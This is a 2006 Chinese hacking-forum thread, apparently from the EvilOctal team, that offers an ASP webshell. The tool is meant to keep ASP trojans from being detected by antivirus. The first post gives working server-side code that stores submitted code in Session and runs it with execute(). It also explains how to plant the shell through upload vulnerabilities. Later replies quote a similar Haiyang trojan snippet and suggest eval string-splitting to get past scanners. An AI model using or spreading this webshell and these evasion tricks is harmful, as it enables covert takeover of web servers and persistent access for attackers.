当前位置:文档之家› asp马免杀工具——asp万能溶剂

asp马免杀工具——asp万能溶剂

[原创]asp马免杀工具——asp万能溶剂
文章标题:[原创]asp马免杀工具——asp万能溶剂顶部 虫虫 发布于:2006-05-0816:36 [楼主][原创]asp马免杀工具——asp万能溶剂
文章作者:虫虫
信息来源:邪恶八进制信息安全团队(https://www.doczj.com/doc/025910663.html,)

7天前俺询问netxfly合不合适把这个工具发出来,结果都不理俺~~~嘿嘿~~51节嘛,大家都好忙哪~

asp万能溶剂----呵呵,忽然想出了一个这样的名字给我的小工具,感觉还够形象.
这是一个演示版本

先打个广告吧:
虫虫的asp万能溶剂----主要用于asp木马的免杀.目前为止可以使大部分的asp木马(不使用include的马)完全免受杀毒软件的追杀(不过LAKE的ASP木马查杀工具可以找到俺)~~

哈哈哈,好了不说了,发现我废话好多

其实很简单:思路就是将asp代码写入到session中保存,使用是只要execute(session("xx"))就可以,由于不用写文件,所以免除了被杀的危险,使用的时候感觉这个asp完全变成了要使用的木马~~所以想了个名字叫asp万能溶剂~其实俺还想叫他asp变形虫虫~~~
这样不追求将asp特征码修改而是完全不使用文件存储木马,可以说是另外一个免杀的思路吧.

代码分两部分,本地部分和服务器上的asp部分,跟一句话木马貌似,其实就是一句话的改进.
代码里有些注释,可以看看.

这是偶的代码:服务器上的asp部分

Copycode
<%ifrequest("aspcode_estcc_060430")<>""then
session("aspcode_estcc_060430")=request("aspcode_estcc_060430")
endIf
execute(session("aspcode_estcc_060430"))%>

这是本地部分,为啥还写一个这么麻烦的本地部分呢,因为如果asp马里有<%这个的话execute就不能正确执行,只好变通一下拉~~写的不是很好,大家批评一下吧:

Copycode

body,textarea,form,input,button
{
font-size:12px;
border-width:1px;
border-style:double;
}



虫虫的ASP万能溶剂(变形虫虫?)



把asp文件打开后整个复制过来就可以
include变通自己想办法吧


溶剂在这个地方:

开始溶解!

使用的时候利用上传漏洞把那个asp部分保存到服务器上去(这个东西还没有杀毒软件认识,所以可以放心的往上扔,呵呵),然后打开本地的那个html文件,把你的木马放上去就可以啦~~以后访问这个asp的时候效果跟访问木马一模一样~~(万能变形虫,哈哈),什么时候想换马重新"溶解"一次就好啦~~

好了,不废话了,大家使用一下看看有什么不方便的地方再讨论吧.

AAV.rar


[此贴被EvilOctal在2006-05-0901:24重新编辑]顶部 sobiny 发布于:2006-05-0821:20 [1楼]
请问楼主
<%ifrequest("aspcode_estcc_060430")<>""then
session("aspcode_estcc_060430")=request("aspcode_estcc_060430")
endIf
execute(session("aspcode_estcc_060430"))%>
换成<%ifrequest("aspcode_estcc_060430")<>""then
execute(request("aspcode_estcc_060430"))%>
有什么不一样呢?
而且实在看不出,这和海洋的C\S版的木马有什么区别呢。。除了长一点?顶部 ZV 发布于:2006-05-0821:25 [2楼]
丫没看文章把,楼主的文章的精髓就在被你省略的那句里面了.

其实大多程序都没使用execute吧,有什么程序能用到吗?看到这个就干掉不就省了.顶部 虫虫 发布于:2006-05-0821:52 [3楼]

Quote:
这里是引用第[4楼]的ZV于2006-05-0821:25发表的:
丫没看文章把,楼主的文章的精髓就在被你省略的那句里面了.

其实大多程序都没使用execute吧,有什么程序能用到吗?看到这个就干掉不就省了.

恩,是啊.连接数据库的时候也有一个execute,不过那个execute是肯定前面有一个点的就是conn.execute LAKE大哥对这个研究最多.所以我前面说还是躲不过LAKE的杀毒~~哈哈

要是单纯检查execute的话倒是有方法躲过,就是使用eval,js里常有eval,asp里也是可以使用的.
eval"ex"+"ecute...."的话倒是没有execute了,但是eval又是被关注的对象.呵呵

这些也不是我自己想出来的,好象LAKE大哥在黑防上说过?
还没想到更好的方法.用微软的加密工具倒是不错的想法.顶部 晨曦 发布于:2006-05-0822:07 [4楼]
海洋木马2006a

IfRequest("password")<>""ThenSession("lcxMarcos")=Request("password")
IfSession("lcxMarcos")<

>""ThenExecute(Session("lcxMarcos"))

楼主的
<%ifrequest("aspcode_estcc_060430")<>""then
session("aspcode_estcc_060430")=request("aspcode_estcc_060430")
endIf
execute(session("aspcode_estcc_060430"))%>

没有什么新意,都是一个原理,把木马写到进程里面,从内存调用来执行顶部 sobiny 发布于:2006-05-0823:52 [5楼]
哦,我终于理解到楼主的想法了哈~~
楼主的想法是这样的,以后只要访问这个页面,就可以直接得到后门哈
呵呵
是这样吧,服务器,本地,相对都没有文件存在?
是这个意思吧?呵呵。谢谢ZV大哥的提醒

ps:本来准备关了电脑准备睡觉了,不过想起了那一个ifXXX<>""then这一句,好象直接访问应该得不到后门吧,今天就先看到这了
明天起来再看,睡觉的时候想一想,会有什么特别的东西在里面哈。


[此贴被sobiny在2006-05-0900:04重新编辑]顶部 虫虫 发布于:2006-05-0907:28 [6楼]

Quote:
这里是引用第[4楼]的晨曦于2006-05-0822:07发表的:
海洋木马2006a

IfRequest("password")<>""ThenSession("lcxMarcos")=Request("password")
IfSession("lcxMarcos")<>""ThenExecute(Session("lcxMarcos"))

.......


...这个..不好意思,
写这个的时候主要考虑是免杀也没考虑太多.
用这个工具方便之处就在不用辛辛苦苦的做免杀了
可是我没有看过海洋木马2006a的代码~~还以为是第一个呢,抱歉.
顶部 netxfly 发布于:2006-05-1308:56 [7楼]
海阳2006还有用Application对象的顶部 小没良心的 发布于:2006-05-1912:48 [8楼]
强人....

思路就是将asp代码写入到session中保存,使用是只要execute(session("xx"))就可以顶部 justcrack 发布于:2006-09-0117:01 [9楼]
另外,如果我没搞错的话,一句话需要写入权限。这个不需要。
收藏了,以后就用这个。(c)Copyleft2003-2007,EvilOctalSecurityTeam.
ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.
Regsiteredversiondoesnotshowthismessage.
YoucandownloadChmDecompilerat:https://www.doczj.com/doc/025910663.html,/


相关主题
相关文档 最新文档